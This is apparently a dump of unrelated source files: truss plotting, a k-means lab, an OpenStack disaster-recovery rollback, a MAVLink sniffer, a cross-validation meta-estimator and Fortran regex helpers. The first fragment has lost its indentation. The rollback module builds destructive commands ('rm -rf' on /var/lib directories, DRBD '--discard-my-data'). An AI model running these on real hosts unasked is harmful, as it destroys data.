xx = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([ymin - yRange*factor, ymax + yRange*factor])
plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
plt.xlabel('Y Position')
plt.ylabel('Z Position')
plt.title('Truss - YZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_YZ_View.png')
# Write results to VTK files to enable more-flexible visualization via ParaView
# (or any other VTK-supporting viewer)
f = open('TrussOriginal.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Original Configuration \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
f.write(str(nodes[i]['x']) + " " + str(nodes[i]['y']) + " " + str(nodes[i]['z']) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
f.write("3 \n") # All "cells" are of type VTK_LINE
f.close()
f = open('TrussNew.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Deformed Configuration - Deformation scaled by " + str(displayScaleFactor) + "x \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
f.write(str(xNew[i]) + " " + str(yNew[i]) + " " + str(zNew[i]) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
f.write("3 \n") # All "cells" are of type VTK_LINE
f.close()
| bsd-3-clause | -8,282,621,646,964,861,000 | 35.080257 | 150 | 0.569891 | false | 2.738214 | false | false | false |
r2m/machine-learning | k-means/lab2/main.py | 1 | 3130 | import numpy as np
import matplotlib.cm as cm
import KMeans as kmeans
from Point import Point
from Plotter import Plotter
from Centroid import Centroid
def loadData(fileName):
"""
Returns two data sets.
First return value is the x values and the second one is the y values.
"""
data = np.loadtxt(fileName)
    data = map(list, zip(* data)) # transpose: rows of (x, y) pairs -> [x values, y values]
return (data[0], data[1])
def getCentroids(clusterPoints):
centroids = []
colors = iter(cm.rainbow(np.linspace(0, 1, len(clusterPoints))))
for index in xrange(0, len(clusterPoints)):
centroids.append(Centroid(clusterPoints[index], next(colors), index))
return centroids
if __name__ == '__main__':
# Init the plotter with some axis parameters
plotter = Plotter([-20, 80], [-20, 80])
# Load data
# TODO Try loading the smallDataSet.txt and see what happens.
# Try not to use the large data sets since the program will be quite slow
# If you want a different dataset talk to @Johan
trainingX, trainingY = loadData('testData.txt')
print "Init - show the data..."
# Just show the data
plotter.plotUnlabledData(trainingX, trainingY)
plotter.show()
raw_input('Press enter to continue')
# Define the centroids based on some points
print "Init - Create the first cluster points and plot them..."
# TODO here is where you change the number of centroids by adding or removing the points.
# The numbers represent the starting points of each centroid with the following coordinate pair: (x, y)
clusterPoints = [Point(2, 3), Point(35, 20), Point(40, 40), Point(60, 60), Point(30, 30)]
centroids = getCentroids(clusterPoints) # just convert the points to centroids for plotting and labeling assistance...
plotter.plotCentroids(centroids)
print "Init complete..."
raw_input('Press enter to continue and to start the algorithm.')
    # Run the algorithm 10 times
    # TODO So right now we are running the algorithm 10 times. Maybe we should come up with some better measurement?
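    # One common alternative (a sketch, not implemented here): iterate until the
    # labels stop changing between two passes, i.e. until the clustering converges.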
    for x in xrange(10):
        # Get labels
        print "Create the labels, this should take some time...."
# The interesting part is what is going on in the classify method.
labels = kmeans.classify(trainingX, trainingY, centroids)
# Plot the labled data
print "Plot the labled data."
plotter.clear()
plotter.plotCentroids(centroids)
plotter.plotLabledData(trainingX, trainingY, labels, centroids)
raw_input('Press enter to continue')
        # Recalculate the centroids and unlabel the data, so to say...
print "Plot the new centroids."
plotter.clear()
plotter.plotUnlabledData(trainingX, trainingY)
centroids = kmeans.reCalculateCentroids(trainingX, trainingY, labels, centroids)
plotter.plotCentroids(centroids)
raw_input('Press enter to continue')
raw_input("Trying out the clusters with some new data... press enter to continue")
# Here we just look as some different data.
rawDataX, rawDataY = loadData('largeDataSet.txt')
labels = kmeans.classify(rawDataX, rawDataY, centroids)
plotter.clear()
plotter.plotCentroids(centroids)
plotter.plotLabledData(rawDataX, rawDataY, labels, centroids)
raw_input('Finished. Press enter to close.')
| apache-2.0 | -5,114,689,128,812,637,000 | 34.568182 | 119 | 0.739936 | false | 3.394794 | false | false | false |
fs714/drcontroller | drcontroller/test/recovery_rollback.py | 1 | 7584 | import logging
import os
import hashlib
from functools import wraps
from taskflow import engines
import sys
sys.path.append('../recovery')
from base import AnsibleTask, ShellTask, LinearFlowCreator, UnorderedFlowCreator
sys.path.append("../db")
from db_Dao import DRGlanceDao, DRNovaDao
def task_list(fn):
@wraps(fn)
def wrapper(self, tasks, *args, **kwargs):
task = fn(self, *args, **kwargs)
task.add_result_handler(self.result_handler)
tasks.append(task)
return wrapper
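
# Usage sketch for the decorator above: a decorated create_*_task method is
# called with a task list as its first argument, and the freshly created task
# is appended to that list, e.g.
#   handler.create_umount_task(handler.disc_tasks)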
class RollbackHandler(object):
def __init__(self):
self.logger = logging.getLogger("RecoveryHandler")
self.logger.info('Init RecoveryHandler')
result_handler = ResultHandler()
self.glance_handler = GlanceHandler(result_handler)
self.nova_handler = NovaHandler(result_handler)
def start(self, *req, **kwargs):
self.logger = logging.getLogger("RecoveryHandler:start")
self.logger.info("--- Hello Recovery ---")
flow = self.prepare()
eng = engines.load(flow)
eng.run()
results = eng.storage.fetch_all()
print results
return ['Hello Recovery']
def prepare(self):
flows = [self.glance_handler.prepare(), self.nova_handler.prepare()]
flow = UnorderedFlowCreator().create('restore', flows)
return LinearFlowCreator().create('DR_restore', [self.nova_handler.stop_vm_task[0], flow] + self.glance_handler.drbd_tasks)
class RecoveryError(Exception):
pass
class ResultHandler(object):
def __init__(self):
pass
def analyze(self, name, result):
for host in result['dark']:
print 'Error in Task "%s": %s' % (name, result['dark'][host]['msg'])
raise RecoveryError('Error in Task "%s": %s' % (name, result['dark'][host]['msg']))
for host in result['contacted']:
self.analyze_result_for_host(name, result['contacted'][host])
def analyze_result_for_host(self, name, result):
if 'msg' in result and result['msg'] != '':
print 'Error in Task "%s": %s' % (name, result['msg'])
if 'service-start' in name:
raise RecoveryError('Error in Task "%s": %s' % (name, result['msg']))
if 'stderr' in result and result['stderr'] != '':
print 'Error in Task "%s": %s' % (name, result['stderr'])
if 'role_change' in name and 'State change failed' in result['stderr']:
raise RecoveryError('Error in Task "%s": %s' % (name, result['stderr']))
if 'stdout' in result and result['stdout'] != '':
print 'Output in Task "%s": %s' % (name, result['stdout'])
class ComponentHandler(object):
def __init__(self, component, hosts, disc, result_handler):
self.component = component
self.hosts = hosts
self.disc = disc
self.config = None
self.disc_tasks = []
self.result_handler = result_handler
self.restore_tasks =[]
@task_list
def create_role_change_task(self):
drbd = 'openstack' #config
return ShellTask('%s_role_change' % drbd, self.hosts, 'drbdadm secondary %s' % drbd)
@task_list
def create_disconnect_task(self):
drbd = 'openstack' #config
return ShellTask('%s_disconnect' % drbd, self.hosts, 'drbdadm disconnect %s' % drbd)
@task_list
def create_network_up_task(self):
return ShellTask('network_neo4_up', self.hosts, 'ifconfig eno4 up')
@task_list
def create_connect_task(self):
drbd = 'openstack' #config
return ShellTask('%s_connect' % drbd, self.hosts, 'drbdadm -- --discard-my-data connect %s' % drbd)
def prepare(self):
self.create_tasks()
return self.create_flow()
def create_tasks(self):
raise NotImplementedError()
def create_flow(self):
raise NotImplementedError()
def analyze(self):
raise NotImplementedError()
class GlanceHandler(ComponentHandler):
def __init__(self, result_handler):
controllers = ['10.175.150.16'] #config
super(GlanceHandler, self).__init__('glance', controllers, 'drbd0', result_handler)
self.db = DRGlanceDao()
self.drbd_tasks = []
@task_list
def create_restore_backup_task(self):
return ShellTask('%s_fs_restore' % self.component, self.hosts, 'chdir=/var/lib mv %sbak %s' % (self.component, self.component))
@task_list
def create_remove_task(self):
return ShellTask('%s_fs_remove' % self.component, self.hosts, 'chdir=/var/lib rm -rf %s' % self.component)
@task_list
def create_umount_task(self):
return AnsibleTask('%s_fs_umount' % self.component, self.hosts, 'mount', 'src=/dev/%s name=/var/lib/%s fstype=xfs state=unmounted' % (self.disc, self.component))
def create_tasks(self):
self.create_umount_task(self.disc_tasks)
self.create_remove_task(self.disc_tasks)
self.create_restore_backup_task(self.disc_tasks)
self.create_disconnect_task(self.drbd_tasks)
self.create_role_change_task(self.drbd_tasks)
self.create_network_up_task(self.drbd_tasks)
self.create_connect_task(self.drbd_tasks)
def create_flow(self):
return LinearFlowCreator().create('glance_op', self.disc_tasks + self.restore_tasks)
class NovaHandler(ComponentHandler):
def __init__(self, result_handler):
nodes = ['10.175.150.16'] #config
super(NovaHandler, self).__init__('nova', nodes, 'drbd1', result_handler)
self.db = DRNovaDao()
self.instance_tasks = {}
self.base_tasks = {}
self.stop_vm_task = []
self.instance_ids = []
@task_list
def create_restore_backup_task(self):
return ShellTask('%s_fs_restore' % self.component, self.hosts, 'chdir=/var/lib/%s mv instancesbak instances' % self.component)
@task_list
def create_remove_task(self):
return ShellTask('%s_fs_remove' % self.component, self.hosts, 'chdir=/var/lib/%s rm -rf instances' % self.component)
@task_list
def create_rebase_task(self, host, instance_uuid_local, base_uuid_local):
        return ShellTask('rebase', host, 'chdir=/var/lib/nova/instances/%s qemu-img rebase -u -b /var/lib/nova/instances/_base/%s disk' % (instance_uuid_local, base_uuid_local))
@task_list
def create_umount_task(self):
return AnsibleTask('%s_fs_umount' % self.component, self.hosts, 'mount', 'src=/dev/%s name=/var/lib/%s/instances fstype=xfs state=unmounted' % (self.disc, self.component))
@task_list
def create_vm_stop_task(self):
controllers = ['10.175.150.16'] #config
return ShellTask('vm_stop', [controllers[0]], 'python /home/eshufan/scripts/nova_stop_vm.py --instance_ids %s' % ','.join(self.instance_ids))
def create_tasks(self):
for (instance_uuid_primary, instance_uuid_local, image_uuid_primary, image_uuid_local, host_primary, host_local) in self.db.get_all_uuids_node():#[('', 'f6158ecb-18ca-4295-b3dd-3d7e0f7394d2', '10.175.150.16')]:
print (instance_uuid_primary, instance_uuid_local, image_uuid_local)
self.instance_ids.append(instance_uuid_local)
self.create_vm_stop_task(self.stop_vm_task)
self.create_umount_task(self.disc_tasks)
self.create_remove_task(self.disc_tasks)
self.create_restore_backup_task(self.disc_tasks)
def create_flow(self):
return LinearFlowCreator().create('nova_op', self.disc_tasks + self.restore_tasks)
if __name__ == '__main__':
rollback = RollbackHandler()
rollback.start()
| apache-2.0 | 2,197,469,561,397,222,100 | 38.915789 | 218 | 0.635153 | false | 3.470938 | true | false | false |
djnugent/mavlink | pymavlink/examples/mavtcpsniff.py | 43 | 2992 | #!/usr/bin/env python
'''
connect as a client to two tcpip ports on localhost with mavlink packets. pass them both directions, and show packets in human-readable format on-screen.
this is useful if
* you have two SITL instances you want to connect to each other and see the comms.
* you have any tcpip based mavlink happening, and want something better than tcpdump
hint:
* you can use netcat/nc to do interesting redirection things with each end if you want to.
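example:
  # assuming two SITL instances already listen on these localhost ports
  mavtcpsniff.py 5760 5770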
Copyright Sept 2012 David "Buzz" Bussenschutt
Released under GNU GPL version 3 or later
'''
import sys, time, os, struct
from pymavlink import mavutil
#from pymavlink import mavlinkv10 as mavlink
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("srcport", type=int)
parser.add_argument("dstport", type=int)
args = parser.parse_args()
msrc = mavutil.mavlink_connection('tcp:localhost:{}'.format(args.srcport), planner_format=False,
notimestamps=True,
robust_parsing=True)
mdst = mavutil.mavlink_connection('tcp:localhost:{}'.format(args.dstport), planner_format=False,
notimestamps=True,
robust_parsing=True)
# simple basic byte pass through, no logging or viewing of packets, or analysis etc
#while True:
# # L -> R
# m = msrc.recv();
# mdst.write(m);
# # R -> L
# m2 = mdst.recv();
# msrc.write(m2);
# similar to the above, but with human-readable display of packets on stdout.
# in this use case we abuse the self.logfile_raw() function to allow
# us to use the recv_match function ( which is then calling recv_msg ) , to still get the raw data stream
# which we pass off to the other mavlink connection without any interference.
# because internally it will call logfile_raw.write() for us.
# here we hook raw output of one to the raw input of the other, and vice versa:
msrc.logfile_raw = mdst
mdst.logfile_raw = msrc
while True:
# L -> R
l = msrc.recv_match();
if l is not None:
l_last_timestamp = 0
if l.get_type() != 'BAD_DATA':
l_timestamp = getattr(l, '_timestamp', None)
if not l_timestamp:
l_timestamp = l_last_timestamp
l_last_timestamp = l_timestamp
print("--> %s.%02u: %s\n" % (
time.strftime("%Y-%m-%d %H:%M:%S",
time.localtime(l._timestamp)),
int(l._timestamp*100.0)%100, l))
# R -> L
r = mdst.recv_match();
if r is not None:
r_last_timestamp = 0
if r.get_type() != 'BAD_DATA':
r_timestamp = getattr(r, '_timestamp', None)
if not r_timestamp:
r_timestamp = r_last_timestamp
r_last_timestamp = r_timestamp
print("<-- %s.%02u: %s\n" % (
time.strftime("%Y-%m-%d %H:%M:%S",
time.localtime(r._timestamp)),
int(r._timestamp*100.0)%100, r))
| lgpl-3.0 | 1,323,866,075,814,192,600 | 32.244444 | 156 | 0.621324 | false | 3.56615 | false | false | false |
vkuznet/rep | rep/metaml/folding.py | 1 | 15416 | """
This is specific meta-algorithm based on the idea of cross-validation.
"""
from __future__ import division, print_function, absolute_import
import numpy
from sklearn import clone
from six.moves import zip
from . import utils
from sklearn.cross_validation import KFold
from sklearn.utils.validation import check_random_state
from .factory import train_estimator
from ..estimators.interface import Classifier, Regressor
from ..estimators.utils import check_inputs
import pandas
__author__ = 'Tatiana Likhomanenko, Alex Rogozhnikov'
__all__ = ['FoldingClassifier', 'FoldingRegressor']
from .utils import get_classifier_probabilities, get_classifier_staged_proba, get_regressor_prediction, \
get_regressor_staged_predict
class FoldingBase(object):
"""
Base class for FoldingClassifier and FoldingRegressor
"""
def __init__(self,
base_estimator,
n_folds=2,
random_state=None,
features=None,
parallel_profile=None):
self.estimators = []
self.parallel_profile = parallel_profile
self.n_folds = n_folds
self.base_estimator = base_estimator
self._folds_indices = None
self.random_state = random_state
self._random_number = None
# setting features directly
self.features = features
def _get_folds_column(self, length):
"""
Return special column with indices of folds for all events.
"""
if self._random_number is None:
self._random_number = check_random_state(self.random_state).randint(0, 100000)
folds_column = numpy.zeros(length)
for fold_number, (_, folds_indices) in enumerate(
KFold(length, self.n_folds, shuffle=True, random_state=self._random_number)):
folds_column[folds_indices] = fold_number
return folds_column
def _prepare_data(self, X, y, sample_weight):
raise NotImplementedError('To be implemented in descendant')
def fit(self, X, y, sample_weight=None):
"""
Train the classifier, will train several base classifiers on overlapping
subsets of training dataset.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param y: labels of events - array-like of shape [n_samples]
:param sample_weight: weight of events,
array-like of shape [n_samples] or None if all weights are equal
"""
if hasattr(self.base_estimator, 'features'):
assert self.base_estimator.features is None, \
'Base estimator must have None features! Use features parameter in Folding instead'
self.train_length = len(X)
X, y, sample_weight = self._prepare_data(X, y, sample_weight)
folds_column = self._get_folds_column(len(X))
for _ in range(self.n_folds):
self.estimators.append(clone(self.base_estimator))
if sample_weight is None:
weights_iterator = [None] * self.n_folds
else:
weights_iterator = (sample_weight[folds_column != index] for index in range(self.n_folds))
result = utils.map_on_cluster(self.parallel_profile, train_estimator,
range(len(self.estimators)),
self.estimators,
(X.iloc[folds_column != index, :].copy() for index in range(self.n_folds)),
(y[folds_column != index] for index in range(self.n_folds)),
weights_iterator)
for status, data in result:
if status == 'success':
name, classifier, spent_time = data
self.estimators[name] = classifier
else:
print('Problem while training on the node, report:\n', data)
return self
def _folding_prediction(self, X, prediction_function, vote_function=None):
"""
Supplementary function to predict (labels, probabilities, values)
:param X: dataset to predict
:param prediction_function: function(classifier, X) -> prediction
:param vote_function: if using averaging over predictions of folds, this function shall be passed.
For instance: lambda x: numpy.mean(x, axis=0), which means averaging result over all folds.
Another useful option is lambda x: numpy.median(x, axis=0)
"""
X = self._get_features(X)
if vote_function is not None:
print('KFold prediction with voting function')
results = []
for estimator in self.estimators:
results.append(prediction_function(estimator, X))
# results: [n_classifiers, n_samples, n_dimensions], reduction over 0th axis
results = numpy.array(results)
return vote_function(results)
else:
if len(X) != self.train_length:
print('KFold prediction using random classifier (length of data passed not equal to length of train)')
else:
print('KFold prediction using folds column')
folds_column = self._get_folds_column(len(X))
parts = []
for fold in range(self.n_folds):
parts.append(prediction_function(self.estimators[fold], X.iloc[folds_column == fold, :]))
result_shape = [len(X)] + list(numpy.shape(parts[0])[1:])
results = numpy.zeros(shape=result_shape)
folds_indices = [numpy.where(folds_column == fold)[0] for fold in range(self.n_folds)]
for fold, part in enumerate(parts):
results[folds_indices[fold]] = part
return results
def _staged_folding_prediction(self, X, prediction_function, vote_function=None):
X = self._get_features(X)
if vote_function is not None:
print('Using voting KFold prediction')
iterators = [prediction_function(estimator, X) for estimator in self.estimators]
for fold_prob in zip(*iterators):
result = numpy.array(fold_prob)
yield vote_function(result)
else:
if len(X) != self.train_length:
print('KFold prediction using random classifier (length of data passed not equal to length of train)')
else:
print('KFold prediction using folds column')
folds_column = self._get_folds_column(len(X))
iterators = [prediction_function(self.estimators[fold], X.iloc[folds_column == fold, :])
for fold in range(self.n_folds)]
folds_indices = [numpy.where(folds_column == fold)[0] for fold in range(self.n_folds)]
for stage_results in zip(*iterators):
result_shape = [len(X)] + list(numpy.shape(stage_results[0])[1:])
result = numpy.zeros(result_shape)
for fold in range(self.n_folds):
result[folds_indices[fold]] = stage_results[fold]
yield result
def _get_feature_importances(self):
"""
Get features importance
:return: pandas.DataFrame with column effect and `index=features`
"""
importances = numpy.sum([est.feature_importances_ for est in self.estimators], axis=0)
# to get train_features, not features
one_importances = self.estimators[0].get_feature_importances()
return pandas.DataFrame({'effect': importances / numpy.max(importances)}, index=one_importances.index)
class FoldingRegressor(FoldingBase, Regressor):
"""
This meta-regressor implements folding algorithm:
    * training data is split into n equal parts;
* we train n regressors, each one is trained using n-1 folds
To build unbiased predictions for data, pass the **same** dataset (with same order of events)
as in training to `predict` or `staged_predict`, in which case
    each event is predicted by the base estimator that did not use that event during training.
To use information from not one, but several estimators during predictions,
provide appropriate voting function. Examples of voting function:
>>> voting = lambda x: numpy.mean(x, axis=0)
>>> voting = lambda x: numpy.median(x, axis=0)
Parameters:
-----------
    :param sklearn.BaseEstimator base_estimator: base regressor, which will be used for training
:param int n_folds: count of folds
:param features: features used in training
:type features: None or list[str]
:param parallel_profile: profile for IPython cluster, None to compute locally.
:type parallel_profile: None or str
:param random_state: random state for reproducibility
:type random_state: None or int or RandomState
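
    Example (a minimal usage sketch; the estimator and the data names X, y are
    illustrative, not part of this module):

    >>> from sklearn.ensemble import GradientBoostingRegressor
    >>> folder = FoldingRegressor(GradientBoostingRegressor(), n_folds=3)
    >>> folder.fit(X, y)
    >>> unbiased = folder.predict(X)  # same X as in fit => out-of-fold predictions
    >>> averaged = folder.predict(X_new, vote_function=lambda x: numpy.mean(x, axis=0))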
"""
def _prepare_data(self, X, y, sample_weight):
X = self._get_features(X)
y_shape = numpy.shape(y)
self.n_outputs_ = 1 if len(y_shape) < 2 else y_shape[1]
return check_inputs(X, y, sample_weight=sample_weight, allow_multiple_targets=True)
def predict(self, X, vote_function=None):
"""
Get predictions. To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used. Parameters: numpy.ndarray [n_classifiers, n_samples]
:type vote_function: None or function
:rtype: numpy.array of shape [n_samples, n_outputs]
"""
return self._folding_prediction(X, prediction_function=get_regressor_prediction,
vote_function=vote_function)
def staged_predict(self, X, vote_function=None):
"""
Get predictions after each iteration of base estimator.
To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used. Parameters: numpy.ndarray [n_classifiers, n_samples]
:type vote_function: None or function
:rtype: sequence of numpy.array of shape [n_samples, n_outputs]
"""
        return self._staged_folding_prediction(X, prediction_function=get_regressor_staged_predict,
                                               vote_function=vote_function)
def get_feature_importances(self):
"""
Get features importance
:rtype: pandas.DataFrame with column effect and `index=features`
"""
return self._get_feature_importances()
@property
def feature_importances_(self):
"""Sklearn-way of returning feature importance.
This returned as numpy.array, assuming that initially passed train_features=None """
        return self.get_feature_importances().loc[self.features, 'effect'].values
class FoldingClassifier(FoldingBase, Classifier):
"""
This meta-classifier implements folding algorithm:
    * training data is split into n equal parts;
* we train n classifiers, each one is trained using n-1 folds
To build unbiased predictions for data, pass the **same** dataset (with same order of events)
as in training to `predict`, `predict_proba` or `staged_predict_proba`, in which case
    each event is predicted by the base estimator that did not use that event during training.
To use information from not one, but several estimators during predictions,
provide appropriate voting function. Examples of voting function:
>>> voting = lambda x: numpy.mean(x, axis=0)
>>> voting = lambda x: numpy.median(x, axis=0)
Parameters:
-----------
:param sklearn.BaseEstimator base_estimator: base classifier, which will be used for training
:param int n_folds: count of folds
:param features: features used in training
:type features: None or list[str]
:param parallel_profile: profile for IPython cluster, None to compute locally.
:type parallel_profile: None or str
:param random_state: random state for reproducibility
:type random_state: None or int or RandomState
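
    Example (a minimal usage sketch; the estimator and the data names X, y are
    illustrative, not part of this module):

    >>> from sklearn.ensemble import GradientBoostingClassifier
    >>> folder = FoldingClassifier(GradientBoostingClassifier(), n_folds=3)
    >>> folder.fit(X, y)
    >>> proba = folder.predict_proba(X)  # same X as in fit => out-of-fold probabilities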
"""
def _prepare_data(self, X, y, sample_weight):
X = self._get_features(X)
self._set_classes(y)
return check_inputs(X, y, sample_weight=sample_weight, allow_multiple_targets=True)
def predict(self, X, vote_function=None):
"""
Predict labels. To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used.
:type vote_function: None or function
:rtype: numpy.array of shape [n_samples]
"""
return numpy.argmax(self.predict_proba(X, vote_function=vote_function), axis=1)
def predict_proba(self, X, vote_function=None):
"""
Predict probabilities. To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used.
:type vote_function: None or function
:rtype: numpy.array of shape [n_samples, n_classes]
"""
result = self._folding_prediction(X, prediction_function=get_classifier_probabilities,
vote_function=vote_function)
return result / numpy.sum(result, axis=1, keepdims=True)
def staged_predict_proba(self, X, vote_function=None):
"""
Predict probabilities after each stage of base_estimator.
To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used.
:type vote_function: None or function
:rtype: sequence of numpy.arrays of shape [n_samples, n_classes]
"""
for proba in self._staged_folding_prediction(X, prediction_function=get_classifier_staged_proba,
vote_function=vote_function):
yield proba / numpy.sum(proba, axis=1, keepdims=True)
def get_feature_importances(self):
"""
Get features importance
:rtype: pandas.DataFrame with column effect and `index=features`
"""
return self._get_feature_importances()
@property
def feature_importances_(self):
"""Sklearn-way of returning feature importance.
This returned as numpy.array, assuming that initially passed train_features=None """
        return self.get_feature_importances().loc[self.features, 'effect'].values
| apache-2.0 | 2,105,406,814,477,879,600 | 43.944606 | 118 | 0.638622 | false | 4.250345 | false | false | false |
gotclout/PythonJunk | 6.py | 1 | 1220 | #!/usr/bin/env python
from math import *
MAX_TRI = 9999999L
triangles = []
def next_pos(mn, pos):
if mn > triangles[MAX_TRI - 1]:
return -1
else:
maxv = MAX_TRI - 1
minv = pos
mid = minv + (maxv - minv) / 2
while triangles[mid] != mn and minv < maxv:
if triangles[mid] < mn :
minv = mid + 1
else :
maxv = mid - 1
mid = minv + (maxv - minv) / 2
return mid
def gen_triangles(offset):
triangles[:] = []
i = 1L + offset * MAX_TRI
bound = i + MAX_TRI
print "Generating %i through %i " % (i, bound)
while i <= bound:
triangles.append((i * (i + 1L)) / 2L)
i += 1L
print "Max value = %i " % (triangles[MAX_TRI - 1])
def pe321():
offset = pos = tn = total = count = mn = 0L
n = 1L
while count != 40L:
mn = 2L * n + n * n
while mn % 3L != 0L and mn % 9L != 1L:
n += 1L
mn = 2L * n + n * n
tn = 1L + 8L * mn
if sqrt(tn) % 1 == 0:
count += 1L
total += n
print "%i.\tM(%i) = %i is a triangule number" % (count, n, mn)
# if n == 1L:
n += 1L
# else:
# n += tn / (2 * (n * n))
#else:
# n += 1L
print "The sum of the first %i terms = %i" % (count, total)
pe321()
| mit | -49,138,977,504,631,160 | 21.181818 | 68 | 0.488525 | false | 2.62931 | false | false | false |
kontza/sigal | sigal/plugins/album_title_mangler.py | 1 | 2734 | # -*- coding: utf-8 -*-
# Copyright (c) 2015 - Juha Ruotsalainen
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""Plugin which replaces certain characters in album names.
Rules for conversion are specified in sigal.conf.py -file in
an array of tuples by the name of 'album_title_mangler'. E.g.
album_title_mangler = [('__','-'),('_',' ')]
This example will first convert all double underscores into a single dash,
then convert all single underscores into a single space. You can add
as many tuples as you want, just remember: the order is important,
mangling rules are processed in first-come-first-serve -order.
Btw, the given example above is the default name mangling rule.
"""
import collections
import logging
import os.path
from sigal import signals
logger = logging.getLogger(__name__)
orderedDict = collections.OrderedDict([('__', '-'), ('_', ' ')])
def process_album(album):
'''Process an album title with the predefined rules set in orderedDict.'''
toMangle = album.title
for key in orderedDict.keys():
value = orderedDict[key]
toMangle = toMangle.replace(key, value)
album.title = toMangle
logger.info("Album name mangled to '%s'." % toMangle)
def register(settings):
global orderedDict
pluginName = os.path.splitext(__name__)[-1][1:]
try:
dictInput = settings[pluginName]
od = collections.OrderedDict(dictInput)
orderedDict = od
logger.info(
"Using the following name mangling rules: %s", orderedDict)
    except (KeyError, ValueError, TypeError):
        # Settings didn't contain (valid) input. Use the default.
        logger.info("Using the default name mangling rules: %s", orderedDict)
signals.album_initialized.connect(process_album)
| mit | 5,192,421,733,631,370,000 | 37.507042 | 78 | 0.724579 | false | 4.12368 | false | false | false |
ratnania/fortlint | fortlint/extractors.py | 1 | 6817 | # -*- coding: utf8 -*-
import re
import os
# ...
list_keywords_decs = ["integer", "real", "logical", "type", "class"]
dict_keywords_re = {}
for word in list_keywords_decs:
# pattern = r"[ ]*\b" + word + r"\b\s*::\s*"
pattern = r"[ ]*" + word + r"[^:]*::\s*(.+)"
word_re = re.compile(pattern, re.DOTALL | re.I)
dict_keywords_re[word] = word_re
# ...
# ...
def extract_blocks(word, TAG):
pattern_start = word + "\s+" + TAG
pattern_end = "end\s+" + word + r"\s+\b" + TAG + r"\b"
pattern = pattern_start + "(.*?)" + pattern_end
word_re = re.compile(pattern, re.DOTALL | re.I)
return word_re
# ...
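# Example (illustrative): extract_blocks("module", "foo") returns a compiled
# regex whose group(1) is the body between "module foo" and "end module foo".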
# ...
def extract_signature():
pattern = r"[^:]*\(.+\)"
# pattern ="\(.+\)"
# pattern =r"\s*\(\s*.*\)"
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def extract_arguments():
pattern ="([\w]*),*"
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def get_names_subroutine(text_in):
# ... find subroutine names
keyword = "subroutine"
pattern = r"\b" + keyword + r"\b.*\("
word_re = re.compile(pattern, re.I)
    text = word_re.findall(text_in.lower())
list_names = []
for t in text:
list_s = [s for s in t.split(keyword) if len(s) > 0]
for s in list_s:
list_d = [d.rstrip().lstrip() for d in s.split("(") if len(d) > 0]
list_names.append(list_d[0])
# print ("+++++ subroutine-names :", list_names)
list_names = [name.lower() for name in list_names if len(name) > 0]
return list_names
# ...
# ...
def get_names_function(text_in):
# ... find function names
keyword = "function"
pattern = r"\b" + keyword + r"\b.*\("
word_re = re.compile(pattern, re.I)
    text = word_re.findall(text_in.lower())
list_names = []
for t in text:
